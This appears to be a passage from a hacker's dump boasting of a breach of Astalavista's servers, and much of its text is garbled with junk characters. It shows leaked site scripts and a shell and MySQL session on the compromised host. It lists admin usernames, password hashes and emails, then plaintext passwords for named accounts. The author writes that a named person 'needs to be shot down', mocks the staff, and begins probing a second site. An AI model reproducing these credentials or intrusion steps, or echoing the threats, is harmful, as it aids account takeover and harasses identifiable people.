            $comExploits[$x]['status']    = ‘1′;5 t8 c0 ]' y# g  S$ T( q
            $comExploits[$x]['changelog'] = $date;
, j. w( h; t; G' H3 j+ z. k1 {4 q" y/ c! Q! g7 N5 J. a  a
        }
1 c8 J, k8 J1 R. d[snip]
+ u' q+ p6 M- P3 R' }    $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>6 u7 T0 s( r1 x7 ~8 ^
<rss version=”2.0″>6 Q: V; q3 Z' d
    <channel>
& M! M. t4 r- |, c6 q* @        <title>ASTALAVISTA.com - Exploits</title># f1 q/ g( Q2 c- p6 Y4 M# i
        <link>http://www.astalavista.com/exploits</link>
+ S0 B& z" [8 I2 }7 {7 |        <description>All availably Exploits.</description>7 B- a! n! E7 A+ K2 W
        <language>en-us</language>. S' n/ I0 L. p5 F5 M
        <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
5 a7 o3 G; Z8 D0 t/ q, @5 f- b        <docs>http://blogs.law.harvard.edu/tech/rss</docs>) @4 f1 r4 [' a) n8 G
        <generator>Astalavista.com</generator>: P& G" c5 q) v3 |) ~3 B
        <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
4 O6 V. i8 _0 H5 A    </channel>3 d+ Q5 T4 E2 ~3 |6 y" P, O
</rss>’;
% y  ^& i/ R2 u0 \( ]8 y1 X8 g1 G, A9 `6 {- o+ B7 L- D7 C
    if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {7 Z; Q2 E+ J3 A' F' _
        unlink (FULLPATH . ‘/feed/exploits.xml’);8 g" {6 l1 Y5 l  S& n! v3 ?: v& L
    }
5 b. X5 ?3 l3 q. Q- R0 r: Z2 _6 Y
; v, t' S8 \) N% }/ O+ F# i    file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);, [; K6 q4 L  w$ @4 W5 J, O
[snip]' ~* M. |& c1 e( d
8 q# N) A- r  O# y: Z, j6 }5 \& s2 [
sh-3.2$ cat exploits.sh
# q4 m/ S8 M) T# z9 v) [6 T0 X#!/bin/sh
+ h; X! H5 W1 v
; A& L* c" [4 ?; B###########################################################
3 N7 s4 o$ z- i1 D#                                                         #
8 U7 g5 ~* K8 }#   Title:        milw0rm exploits adder                  #" t7 |- E/ s; d  E8 h# b! k& D
#   Description:  Add all milw0rm exploits to the         #: O. ], @, r2 c: I" c5 A' N
#                 Astalavista.com database                #* H9 U2 F) x+ W) c3 h0 B1 n
#                                                         #
9 B4 N; {+ w3 Y. P#   Company:      Astalavista Group                       #- @. \3 E2 \6 J
#   Author:       Paulo M. Santos                         #- @. P# t7 R& f3 Y5 Q' {! |' K
#   E-Mail:       链接标记paulo.santos@astalavista.ch             #' }( o" Z/ [! q7 F$ [2 Q" c' I2 k
#                                                         #3 m2 \5 {, p4 P: A+ q) w
###########################################################: j+ R" g  ^; G! w- W
( j: u6 y2 h+ Y, ]! j2 D: ^2 o
# path
. w0 _1 @+ x) @( x# }% }% h4 z1 x2 Ithis_path=/home/com/public_html/modifications/cronjobs
' M( F8 D* N7 E- j1 S: b+ y9 p& a' ?% @( \' N- H
# change directory
. X5 y2 y: k7 @, O% H  ccd $this_path. `3 M5 R6 T  X0 ]* Q* e; v# L
cd tmp/9 T& ^3 U7 P* d
4 L5 u$ _5 O0 e  X
# delete files0 W2 {/ R$ @: n6 B' y
rm -rf milw0rm.tar.* &1 O/ z/ p9 Z8 m6 i
rm -rf milw0rm/ &+ D4 ^1 p& a9 x/ A

1 G* j: |( ]- D0 _) U# wget milw0rm paket
5 B; g) B. k5 h1 I8 ^' U+ w" cwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]7 ~9 h( r6 X- Y. n( W) G
- J. w( ?6 J: S7 c5 h
# extract milw0rm paket
7 Y+ U) v. f* C$ etar -xvf milw0rm.tar.bz2
8 X, U1 o6 Q7 k5 T/ `
- r! f1 `8 k" p4 K2 l, a$ k+ n# change owner
% M1 [: o$ u  B# `. ~' t. I8 Vchown -R com ., y# y# i1 k( c. z# b/ o  U9 w
chgrp -R com .
3 @/ e1 C0 @- W2 v+ T$ j
$ `, E" c- Z& `" U' `# execute php script
, ^; D0 |$ I. |- e& w5 t' B5 J: Hcd $this_path" t4 p$ d/ c- C
php -q exploits.php4 T- F5 Y' Q& X" c# b0 ^

) M6 f( W, R8 B7 {8 ?& G5 t# delete files
& T: S  B" b! i0 P8 J" M+ @rm -rf tmp/milw0rm.tar.*: f% a- |+ m& O" P
rm -rf tmp/milw0rm/, F' c2 a. u1 g7 B
/ a- ~$ Y# p1 O* E0 D
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”2 J' R) i& R6 V
Paulo M. Santos needs to be shot down.8 {+ k$ m  a' M% u5 L
. g6 u" M! M2 m1 A
mysql -u contrexxuser2 -p3 a3 G2 j1 F# a4 |  t. z7 t$ F
Enter password:
  {8 O! k# c7 @4 D$ e8 E9 L' BWelcome to the MySQL monitor.  Commands end with ; or \g.
5 C, q9 ^# {8 D* e! R* eYour MySQL connection id is 261694
, _: R& Q( b2 S: XServer version: 5.0.45-community-log MySQL Community Edition (GPL)- @  W7 Q- F, `  S1 z  F  Y

- M% f2 O% K/ `* `Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.7 l& A4 Q" \& f" Q# b* {% x
4 I# U* U* a, n
mysql> show databases;
" U! U8 y' g, m! V+——————–+$ `7 y; ~9 l' w5 ~4 C9 E: D9 a% M
| Database           |
1 d8 v' {: ]9 L+ R+——————–+
& ?9 ~% S( o, V| information_schema |
+ U9 c+ r8 W# f! H| com_contrexx2      |$ n! M8 `5 W6 I9 Z: [0 O) J/ r- d
| com_contrexx2_live |5 _5 |) I" H2 J  k4 d, \* ]
| test               |  f0 \; i" Q7 i/ F6 c) K# D: [
+——————–+; [* R2 D* f% |( k2 @/ M
4 rows in set (0.00 sec)* [6 y7 g! l) {. t

1 R/ O) x! w5 \% V% fmysql> use com_contrexx2_live
- L( m; d: a+ |7 _' l# ~* aDatabase changed8 Y% c1 D- Y' s7 g$ l/ K
mysql> show tables;
0 [. I$ {, U& U: }+————————————————–+
' C7 N% T% w) A| Tables_in_com_contrexx2_live                     |
- Z+ j# ?5 d( V1 Y6 ^) M+————————————————–+
; r6 v) |- b, u; s' ^0 L% T| cc_banner_counter                                |- H# b# V7 }8 ^( x5 t$ U
| cc_search_counter                                |6 c4 O+ ^$ ?- S
| contrexx_access_group_dynamic_ids                |
; i. o. p; w! M6 A2 V+ q1 h| contrexx_access_group_static_ids                 |
5 u+ w7 F' K( R) I9 f, z# m1 o. P, a0 o  W| contrexx_access_rel_user_group                   |
' K- ^! y+ ?" ~0 L& H| contrexx_access_settings                         |  _" `3 Q+ x5 H
| contrexx_access_user_attribute                   |/ ^" Z* Y0 B' a: L' T
| contrexx_access_user_attribute_name              |# }( I& V/ p' ^
| contrexx_access_user_attribute_value             |( J: l" l/ L, _+ y) r% w
| contrexx_access_user_core_attribute              |" w/ H5 L6 p6 @6 E* p4 i$ X/ [
| contrexx_access_user_groups                      |
* X3 q  N; U& t| contrexx_access_user_mail                        |9 b2 v) K. P$ H* k/ R
| contrexx_access_user_profile                     |
( u4 y, C' d( J. m9 d4 m| contrexx_access_user_title                       |# p$ _* J+ M8 f! H  B* L
| contrexx_access_user_validity                    |! J4 [$ l3 q1 u0 P( k
| contrexx_access_users                            |
5 r: Z, r, b+ r7 m$ b| contrexx_backend_areas                           |
" Z0 V' }' \4 G; O- z/ A| contrexx_backups                                 |
# ]. X! k/ s) W. _* [; w# e: e6 b# R. c| contrexx_content                                 |
3 C3 b4 l( |- \# [" G| contrexx_content_history                         |
2 T4 y: R! p' @2 Y| contrexx_content_logfile                         |* H7 p$ z0 k0 B: \
| contrexx_content_navigation                      |- B. c* a& ~/ q9 J$ H
| contrexx_content_navigation_history              |; j) J+ L$ c" I( i7 y
| contrexx_ids                                     |. C7 l* Y8 E' w) z. i% K
| contrexx_languages                               |  F! D; Y1 Z4 @# R9 L% q% g
| contrexx_lib_country                             |( a, N# r) G& `  ^& z
| contrexx_log                                     |1 o7 }$ {7 }* n: `; R7 W2 ^* ?
| contrexx_module_alias_source                     |& J8 v2 H7 _5 @' Z9 {
| contrexx_module_alias_target                     |
9 M  ~1 _2 a( i. ^( {3 t9 [| contrexx_module_block_blocks                     |
, l6 O9 H& q: r| contrexx_module_block_rel_lang                   |& x0 q) f: U- c+ ?, |
| contrexx_module_block_rel_pages                  |, ~/ ^) Z& V3 i$ \
| contrexx_module_block_settings                   |
5 A/ J% ^; H# A3 M  U| contrexx_module_blog_categories                  |+ K! h, o& a8 A  C0 i4 z* K
| contrexx_module_blog_comments                    |- g) [% o, j% w. k
| contrexx_module_blog_message_to_category         |- c, |/ w9 P. p3 D
| contrexx_module_blog_messages                    |
' i6 L3 G# Y% \: {) U' j* J| contrexx_module_blog_messages_lang               |
9 z; C6 |" l2 w* u8 N- A| contrexx_module_blog_networks                    |- Q5 _' p7 `9 _& h% p1 A
| contrexx_module_blog_networks_lang               |0 P% V( F8 O/ Y) C4 F
| contrexx_module_blog_settings                    |( G+ l- i) m6 I- O8 o
| contrexx_module_blog_votes                       |
" x1 G. P# l3 \5 L! l  f5 C9 Y* m| contrexx_module_calendar                         |- @9 v) ~* t. g$ M% c
| contrexx_module_calendar_access                  |
4 E, I; y' U; E( w7 U; x2 q1 H) q| contrexx_module_calendar_categories              |8 @# M, M. a9 k, i
| contrexx_module_calendar_form_data               |
# R! o! [  Z# S8 p1 N3 P& {| contrexx_module_calendar_form_fields             |
* u0 `1 k: r% f  D7 B4 c. d| contrexx_module_calendar_registrations           |' G9 `9 Q$ S+ F/ \0 r1 P
| contrexx_module_calendar_settings                |1 U" T+ m% l6 i% v4 W* `. J
| contrexx_module_calendar_style                   |
3 Y" s. f% e" _# I5 L| contrexx_module_contact_form                     |& y5 y7 C0 q! F/ C  b
| contrexx_module_contact_form_data                |8 s# H( O% d6 h2 R4 O/ B
| contrexx_module_contact_form_field               |# g3 t  j, `) y8 e" O- s9 A1 i
| contrexx_module_contact_settings                 |
7 K0 x( i1 c* @" p| contrexx_module_data_categories                  |$ y0 l; p' S( [0 O1 w% W% o
| contrexx_module_data_message_to_category         |8 H. W6 s0 W) f5 d, p. C4 `0 a
| contrexx_module_data_messages                    |  D7 [3 c. V) `, G0 [: o  E3 |. I
| contrexx_module_data_messages_lang               |7 O; R0 J: [* M" ?& H0 O
| contrexx_module_data_placeholders                |$ J: o9 Y' _1 s, e
| contrexx_module_data_settings                    |
8 e* O. i0 }, b# q! h9 F| contrexx_module_directory_access                 |% k  c3 e/ y/ C( i
| contrexx_module_directory_categories             |
; Z3 I( _! Z! _# s6 e| contrexx_module_directory_dir                    |
& c% G/ l- P" b3 q2 h| contrexx_module_directory_inputfields            |
2 a8 q) I6 B& V( i5 `' e: T' \| contrexx_module_directory_levels                 |9 I8 P  }2 N6 n; Y) x
| contrexx_module_directory_mail                   |' @# S5 \* U/ J0 u
| contrexx_module_directory_rel_dir_cat            |  E9 X- j5 x( w; e1 F8 z3 N
| contrexx_module_directory_rel_dir_level          |$ w# ]2 H. C$ D3 q5 Z" k6 ]
| contrexx_module_directory_settings               |9 K& R4 Y: g# C( d0 f& d8 n5 t
| contrexx_module_directory_settings_google        |
( p9 z5 w& S6 b. x| contrexx_module_directory_vote                   |
& U/ N" X& w: P. E1 ]9 v' M| contrexx_module_docsys                           |. u) v- I5 o$ D, \, Y. }$ f
| contrexx_module_docsys_categories                |
* H' n+ g$ [) ^* t| contrexx_module_egov_configuration               |: C, @; {( Z, a: Y1 Z( |6 a$ o
| contrexx_module_egov_orders                      |
* O# O5 _/ |4 f| contrexx_module_egov_product_calendar            |
# l9 n2 }, S2 D3 p, G1 V| contrexx_module_egov_product_fields              |
9 L) a" s6 F6 a+ E/ N| contrexx_module_egov_products                    |& e# y9 {( [$ s- o. W; i
| contrexx_module_egov_settings                    |
% d* J( O8 U2 a| contrexx_module_exploits                         |+ Q6 u" D) }/ h* J9 x
| contrexx_module_exploits_categories              |" U$ I2 a: [+ [5 o
| contrexx_module_feed_category                    |
; o8 s+ D, |" k/ o+ ^) i| contrexx_module_feed_news                        |4 k+ Z& ^  B1 z7 ^" M2 N
| contrexx_module_feed_newsml_association          |- S4 k( M" F* o5 V& R* p
| contrexx_module_feed_newsml_categories           |( i/ ^8 \5 d; B) t# S: O2 N8 `
| contrexx_module_feed_newsml_documents            |( Z$ y2 a# |# C: p- T
| contrexx_module_feed_newsml_providers            |
- G* i' A# @$ \% d6 `- s- K| contrexx_module_forum_access                     |
$ b9 r. h. c; [$ o* k) ^| contrexx_module_forum_categories                 |+ H: \2 r  _5 U9 q
| contrexx_module_forum_categories_lang            |/ l" [# V4 a2 `2 M+ r( Q3 E
| contrexx_module_forum_notification               |
- p% j, Y% }1 `1 _| contrexx_module_forum_postings                   |
* C! Z0 y" `, X8 p/ z( z- k9 |8 \| contrexx_module_forum_rating                     |
! }- Z  i4 b$ F# f2 X! M| contrexx_module_forum_settings                   |+ ?" g% @; v2 M: c
| contrexx_module_forum_statistics                 |
; j& Z8 o2 x+ _! Q# |/ \" y| contrexx_module_gallery_categories               |" N. B! ]9 V4 W: V: _; f0 u% W+ Y
| contrexx_module_gallery_comments                 |/ B3 w$ |9 u6 }9 E, M4 H
| contrexx_module_gallery_language                 |! F; U& p6 C& c+ _
| contrexx_module_gallery_language_pics            |
6 ?! G8 w8 B8 Z; X; u* T| contrexx_module_gallery_pictures                 |
4 I2 ?) Y+ y5 D1 ?( e! ]* p| contrexx_module_gallery_settings                 |& M- v5 M. m9 v+ B' D& v$ \3 s5 \
| contrexx_module_gallery_votes                    |- e' B' f2 L3 l3 M3 k1 a0 X( w  z
| contrexx_module_guestbook                        |; Q; p7 N& f8 F2 ~
| contrexx_module_guestbook_settings               |
  k5 k  d; F9 }/ g| contrexx_module_livecam                          |
! P* k# l/ N' W, n7 g: g4 G| contrexx_module_livecam_settings                 |$ ^4 x: l, \$ M" w
| contrexx_module_market                           |
& Q/ p# f5 e; a- c2 R| contrexx_module_market_access                    |! P' P% X  o. b+ @
| contrexx_module_market_categories                |2 n* z1 d& o) a) t
| contrexx_module_market_mail                      |
; k+ R% x, \( n" V% t) m$ m| contrexx_module_market_paypal                    |6 [6 _/ d3 g! t5 U& W
| contrexx_module_market_settings                  |- ]# W) O1 W4 [
| contrexx_module_market_spez_fields               |
) C: A6 b/ N& `$ P| contrexx_module_mediadir_access                  |
  k2 O. y' n, ]1 J. l3 X1 u7 || contrexx_module_mediadir_categories              |
  F: V+ ?* c! }& @. b" R| contrexx_module_mediadir_comments                |8 d# X# y/ r6 j7 f! a1 T( R
| contrexx_module_mediadir_dir                     |: B7 H  Y3 F( T0 v, Y9 X) F
| contrexx_module_mediadir_inputfields             |/ d/ _6 ~9 g! V+ X
| contrexx_module_mediadir_levels                  |
% \: \; N! @% K6 ]4 F2 H' G| contrexx_module_mediadir_mail                    |' Q* y; ~, ]/ `9 `
| contrexx_module_mediadir_rel_dir_cat             |" \' Y: A, P4 a5 P: H! O
| contrexx_module_mediadir_rel_dir_level           |/ h4 n# A; X9 H7 ~" ^- K
| contrexx_module_mediadir_reports                 |5 b& G' e: s* v
| contrexx_module_mediadir_settings                |
. Q* [* q& r: N$ I& I| contrexx_module_mediadir_settings_google         |0 W9 m& d. }+ ~2 |) n
| contrexx_module_mediadir_vote                    |
3 R5 C3 q6 \* W0 Q5 @| contrexx_module_memberdir_directories            |/ Y; F9 P) l: L8 W
| contrexx_module_memberdir_name                   |
! h, [. P5 n3 m' K3 O| contrexx_module_memberdir_settings               |
3 V$ U8 r) e, ^' {/ {, E1 Q| contrexx_module_memberdir_values                 |, ]8 P- Y9 k& H* T0 ?( H( y8 _
| contrexx_module_nettools_allowed_groups          |
4 m6 m6 h# [/ e0 s% |. p- x0 w| contrexx_module_nettools_settings                |4 ?- U0 u% t; Z* Y1 Q
| contrexx_module_news                             |
" k0 a  X; ]) L; S6 i* }1 f% ?) d| contrexx_module_news_access                      |) G8 `9 w0 D) L6 t( `8 b( y: Z/ i/ p
| contrexx_module_news_categories                  |
+ D: D- v- }" f. P# B| contrexx_module_news_settings                    |
4 Y. Y& t& i  {5 Y3 Y2 }2 C/ l2 z% a| contrexx_module_news_teaser_frame                |; A+ |& n8 Z3 |/ h- m+ n7 _# d
| contrexx_module_news_teaser_frame_templates      |
: P! f9 e$ T; A0 n% d| contrexx_module_news_ticker                      |
' y5 E5 d" g! G7 A! }8 N4 R4 C| contrexx_module_newsletter                       |
7 e- B1 F  I; ?| contrexx_module_newsletter_attachment            |
9 @' a" t/ c& q' Y) h| contrexx_module_newsletter_category              |9 c: g/ y! n# ~
| contrexx_module_newsletter_confirm_mail          |
1 r# i) W! M8 A  [8 y| contrexx_module_newsletter_rel_cat_news          |
$ X( R) T7 j, j| contrexx_module_newsletter_rel_user_cat          |
  v; a9 m9 L; U0 W0 q5 `6 Y' f| contrexx_module_newsletter_settings              |
' k( f5 h6 r6 P! l$ m0 v| contrexx_module_newsletter_template              |$ D& n6 q8 C3 z, m* P# G
| contrexx_module_newsletter_tmp_sending           |8 z1 V7 F! D. d0 Q6 J0 a8 ?
| contrexx_module_newsletter_user                  |
1 Q# ^7 @! x% g9 F| contrexx_module_newsletter_user_title            |
9 O3 U3 {2 B1 C/ D  \' t| contrexx_module_onlinetools_defaultports         |9 G; ]: ^8 K' H* H( F
| contrexx_module_onlinetools_defaultports_back    |% N% r; p% j( O
| contrexx_module_onlinetools_geolitecity_blocks   |
/ I& P* D, B) X4 T) j; q! |( w| contrexx_module_onlinetools_geolitecity_country  |
& K/ ]/ I) d3 H. d6 o| contrexx_module_onlinetools_geolitecity_location |6 z9 d8 Y( R' w  |* U- t2 b0 {
| contrexx_module_podcast_category                 |
0 T& E4 F& K5 Y# c. Q% I, D| contrexx_module_podcast_medium                   |
, x9 H; u, o0 x' W6 s8 ]% H| contrexx_module_podcast_rel_category_lang        |8 w9 v) B+ O0 G6 q  o0 G6 [5 n  x; V
| contrexx_module_podcast_rel_medium_category      |
4 M% \/ l  y# r+ o( V- S| contrexx_module_podcast_settings                 |
9 W$ P+ ]3 N; ~/ J/ D) \* b  `9 X| contrexx_module_podcast_template                 |' r; S- i) P7 G4 \! h) p1 R
| contrexx_module_proxydb                          |* r) A. ]# q: F5 s  q
| contrexx_module_recommend                        |
, @) R2 K  A7 g% T) r* w1 l& M| contrexx_module_repository                       |/ X. R: ?0 s& `7 ^! \; Z
| contrexx_module_securitynews_cats                |
5 C* G7 d  m1 }+ D| contrexx_module_securitynews_feeds               |
& W3 {' |, j6 w' }| contrexx_module_securitynews_news                |' [7 q/ ^2 q0 \- j" Q
| contrexx_module_shop_categories                  |
) I' W) v) i1 b2 @* A. x; L| contrexx_module_shop_config                      |
$ F6 D8 b6 M9 y) f/ p| contrexx_module_shop_countries                   |
' T) P  p' ^" Z2 c| contrexx_module_shop_currencies                  |& d* `- v, {0 M) k* p
| contrexx_module_shop_customers                   |
! C- }- U7 L8 D6 f2 T# q| contrexx_module_shop_importimg                   |
, }- ~% n; ^' U9 l- K% t) g| contrexx_module_shop_lsv                         |
; b: Z  _9 I: G7 y/ _| contrexx_module_shop_mail                        |
" Z* e4 @8 G/ p' \| contrexx_module_shop_mail_content                |
2 E8 [3 L) F' l; g  f. z8 k| contrexx_module_shop_manufacturer                |
9 o- T+ N; ?0 B; ~2 l0 M| contrexx_module_shop_order_items                 |
' I+ e2 P; c6 e1 H, Y1 a5 V| contrexx_module_shop_order_items_attributes      |
+ {% r6 ~% u: n| contrexx_module_shop_orders                      |- d1 P& Z! q  x5 q4 j: t0 q: ]1 F. z2 A
| contrexx_module_shop_payment                     |
8 z( D3 {/ y- I| contrexx_module_shop_payment_processors          |
% Z; y0 s+ B% y8 H! q$ {* ^| contrexx_module_shop_pricelists                  |: ^  E8 x3 Y% x# N4 J/ L# G
| contrexx_module_shop_products                    |
1 P/ n' p; x* R" X( f' w' Q( `| contrexx_module_shop_products_attributes         |
  t; s) s5 z% h| contrexx_module_shop_products_attributes_name    |: ~" B# D  n2 g/ T7 e
| contrexx_module_shop_products_attributes_value   |9 D2 \" v6 b- {0 O7 P
| contrexx_module_shop_products_downloads          |% R; b* e$ h  y
| contrexx_module_shop_rel_countries               |6 J- y# z! `% B# R: R1 f
| contrexx_module_shop_rel_payment                 |0 ^# E4 W( ^% O! x  l+ u
| contrexx_module_shop_rel_shipment                |8 p% T, A+ w' u% L# l' ?1 H$ s
| contrexx_module_shop_shipment_cost               |
& ]; q* Z, W1 ~5 q) d. C  Y| contrexx_module_shop_shipper                     |
/ w$ G+ h; N7 {* y5 m% N8 N| contrexx_module_shop_vat                         |
/ l" p, }( D$ X2 ~$ O| contrexx_module_shop_zones                       |2 d, K# |. ~2 r# I+ _% f% N; [
| contrexx_module_u2u_address_list                 |
- `" w' k& [6 Q8 n1 Z# g| contrexx_module_u2u_message_log                  |
! E3 b. C" V$ Q* |  N, R| contrexx_module_u2u_sent_messages                |( Z/ w  I) n+ ?4 l
| contrexx_module_u2u_settings                     |
6 |6 @  c' g( O+ J$ N| contrexx_module_u2u_user_log                     |4 Y$ @+ r- T" c) G( l
| contrexx_modules                                 |
: ~9 d$ I+ z3 _# W' H| contrexx_sessions                                |
  F8 K& U- m* G( `/ O+ ?- C| contrexx_settings                                |
3 c. h+ ^! ?" z, s| contrexx_settings_smtp                           |% x$ ~. a+ T' W
| contrexx_skins                                   |( r6 u9 S* s5 E+ h2 x
| contrexx_stats_browser                           |
4 o; C) B* y, M4 q9 |" d| contrexx_stats_colourdepth                       |, p. Q9 E; b; ]/ g! ?% c% I& n
| contrexx_stats_config                            |& l7 p7 v: i6 s# u" L( t. C
| contrexx_stats_country                           |" m) ^9 f8 b. }, g% d0 _
| contrexx_stats_hostname                          |0 {6 w' [  F0 h5 ~9 C. u
| contrexx_stats_javascript                        |
0 ~5 M. F8 C8 N! @$ {6 v2 e; i| contrexx_stats_operatingsystem                   |6 R- D9 {8 X. |
| contrexx_stats_referer                           |
0 P# Y' i# ~/ w% s8 ]/ g3 p0 {| contrexx_stats_requests                          |
% a- _  s3 G0 t  b/ o| contrexx_stats_requests_summary                  |+ e* }; @: v) j
| contrexx_stats_screenresolution                  |
; H6 k$ w/ P/ }& W; m| contrexx_stats_search                            |
1 O8 f2 o9 O% g6 n9 H8 K6 m. E| contrexx_stats_spiders                           |
0 b: s: ?+ _+ }5 t) P| contrexx_stats_spiders_summary                   |4 v5 g9 G* U7 b, ^! D1 f* B/ @
| contrexx_stats_visitors                          |( t; B( g8 O' [1 A
| contrexx_stats_visitors_summary                  |& c( m3 R; L1 ^# `& v# \
| contrexx_voting_additionaldata                   |
  i0 c/ _6 Q/ |7 {7 d4 q( C| contrexx_voting_email                            |0 G! ~& \2 G4 s( n) g0 m1 B! l
| contrexx_voting_rel_email_system                 |
' I, a( K# n: r+ P| contrexx_voting_results                          |) R, g2 n* H! b- ~( f/ I/ {
| contrexx_voting_system                           |
+ n  S! A) A9 }9 O  P( y& Y/ Y| foo                                              |
, P  ^) a: B. K+————————————————–+
. R* Z) Q# Z2 V9 V1 Q+ x227 rows in set (0.01 sec). e; \3 m  q8 `2 Z( j6 m
4 K% f5 c- p: i6 D
mysql> select count(*) as skids from contrexx_access_users;
! q5 m* c: j4 J, q) K+——-+# M" ]: Z1 m' f( u* B& s
| skids |  U$ q) o) M# p  _- m& m7 b
+——-+
1 C; a- G) w/ D. t* T1 J0 Y% h3 I' U| 53699 |
& D$ [( p( i. ~% L+——-+
$ P, s1 Y  Z0 X* P" z1 row in set (0.00 sec)
# j! t8 h% V! F- e$ X* _5 P/ C6 Q
/ z7 {/ S( h, j5 Hmysql> describe contrexx_access_users;6 Q" N$ o! b* p
+——————+——————————————+——+—–+————–+—————-+
/ l; ?$ v; i( H- N8 N+ X! z/ ?* m| Field            | Type                                     | Null | Key | Default      | Extra          |, a/ H2 R3 |4 [3 c0 p0 u
+——————+——————————————+——+—–+————–+—————-+' u$ \: ]7 u% w( n+ `) n
| id               | int(10) unsigned                         | NO   | PRI | NULL         | auto_increment |( Z# D  `1 a+ T  _" X: O
| is_admin         | tinyint(1) unsigned                      | NO   |     | 0            |                |* N3 E" t" N. z% q
| username         | varchar(40)                              | YES  | MUL | NULL         |                |5 M' F5 `0 f* {. q- Y
| password         | varchar(32)                              | YES  |     | NULL         |                |. u4 D9 A0 B4 K
| regdate          | int(14) unsigned                         | NO   |     | 0            |                |+ R6 u6 g& n2 [6 @# V* G6 C! C7 p
| expiration       | int(14) unsigned                         | NO   |     | 0            |                |7 x; @' t2 c: t: T' q* d
| validity         | int(10) unsigned                         | NO   |     | 0            |                |
; j. [0 S( F0 d( ]5 \' X3 _| last_auth        | int(14) unsigned                         | NO   |     | 0            |                |7 }$ j, |, V# y  J+ W
| last_activity    | int(14) unsigned                         | NO   |     | 0            |                |2 \# O9 X8 l9 F) M, M7 U# P
| email            | varchar(255)                             | YES  |     | NULL         |                |
) u$ [! g) G' J7 j! }| email_access     | enum(’everyone’,'members_only’,'nobody’) | NO   |     | nobody       |                |
+ T) b$ Y" B! C# U( ^, r| frontend_lang_id | int(2) unsigned                          | NO   |     | 0            |                |1 R* v/ F7 @& m% t7 D& J. @
| backend_lang_id  | int(2) unsigned                          | NO   |     | 0            |                |
( p  v1 d# ?( ~8 K0 u| active           | tinyint(1)                               | NO   |     | 0            |                |
' p& `/ l( M0 U4 N: G. Y1 h; w9 V| profile_access   | enum(’everyone’,'members_only’,'nobody’) | NO   |     | members_only |                |
. Y" K: z1 O* d- x| restore_key      | varchar(32)                              | NO   |     |              |                |
3 s, }4 ?& V8 n% X3 L  U" b| restore_key_time | int(14) unsigned                         | NO   |     | 0            |                |) J; _' z, V) W9 U7 Y. a
| u2u_active       | enum(’0′,’1′)                            | NO   |     | 1            |                |* D% Z5 [4 L5 ~- S
+——————+——————————————+——+—–+————–+—————-+* X: h* C) x) J( ^: q: D* ~! G5 _% j4 O
18 rows in set (0.00 sec). k- |" q' r* p
4 U9 y/ \, ^  o: g  }( s& C
mysql> select username,password,email from contrexx_access_users where is_admin = 1;6 i8 p' B5 l4 @$ @% @- S
+————+———————————-+—————————–+4 W1 @9 q# D0 ?7 ~! z/ g
| username   | password                         | email                       |" b! e9 B* i% s# M/ g- L2 v3 s: S% P
+————+———————————-+—————————–+
. V- a' Y( D( e% l7 || system     | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com          |' D9 T  K4 Y  C" k( R2 q
| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com      |
! \% U3 i2 t6 M4 e* [. ^+ L! s+ @| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
2 d  U4 V2 m4 e6 C4 j* B' p4 K| schmid     | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com   |6 C; r, c. T. M- ~0 i0 W/ j
+————+———————————-+—————————–+
. M' J) C! Q6 y2 E2 R4 rows in set (0.04 sec)
6 g' ^6 v0 S9 B* O, [
: ], n7 x. S( z, h" Q6 M* gmysql> exit;
7 A, b! R) r( HBye: v& q1 r! [7 X; M6 G
8 E  z# g2 N9 [& ?: v1 S
[~] There you go, your “team of security and IT professionals” is a joke.
/ P( ]) v5 ^- _* i4 M
' s3 r; C. h5 d7 l' G+——————————+, b5 r2 Q5 b/ q# w. h2 |
system:f82BN3+_*
+ @" F0 F4 x! H6 ]) f  t) T+ [Be1er0ph0r:belerophor4astacom9 G9 \. y7 o; u8 C% U2 U
prozac:asta4cms!
$ g1 J. z# {5 H5 Y! Q. |commander:mpbdaagf6m; H% V0 W# q- M- P
sykadul:ak29eral% e! S  L7 G2 k5 t0 h1 d2 n
+——————————+
# c1 }" ~8 C+ l8 c$ {# Q1 F1 [8 F5 J' M4 \+ j
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
  y3 |8 y* ~/ B, e+ r…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.5 `0 D1 Z7 z" Z- v

- q) \9 H3 R: `) D[~] Lets move to astalavista.net now,
9 V: w  U6 P/ S2 ~; {2 K" Y  u% Z+ D- x5 p2 C6 J# V' E
From <链接标记[url]https://www.astalavista.net/[/url]>:
7 q' p" K* A' B- R& h% R: y5 y- c>> Everyone knows that the best defense is a good offense.& p* j+ X% f( f0 h, H/ r
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.. ?& l5 W5 z% e; K- I# v
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
- S, j& I7 M/ V* s5 ]7 S>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
: ?- R8 x3 \* h$ R3 m: [, e6 ^7 v3 e& _3 o" @3 m* W; m( k
>> Go ahead, try and hack our server . in a completely legal way!" j: y" @- Y" T6 {0 k
>> Learn by doing: We offer our members tricky tasks and challenges on an
0 h& n7 E: f# p# x5 i>> ongoing basis so you can test your knowledge and abilities. You can also! b) Q5 W) t; Q6 i2 M& h& Y* N
>> demonstrate what you.ve mastered by taking part in regular hacker contests
0 o, n( O2 Z4 v$ ~* B5 i>> and war games! C" e/ h* I0 b
0 `4 D/ w8 ]1 U" S, M, v) W
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!0 r9 u) U1 J) g+ ^! e! K

5 ^% ~/ O3 W4 X[-] Tricky task: Find home dir of astalavista.net4 s, _4 d' G7 q

  z- A0 i8 d1 R( Z( q( Dsh-3.2$ ls -la ~astanet' O5 \/ q5 S7 }& p: j: t$ j0 g0 L/ c
total 48
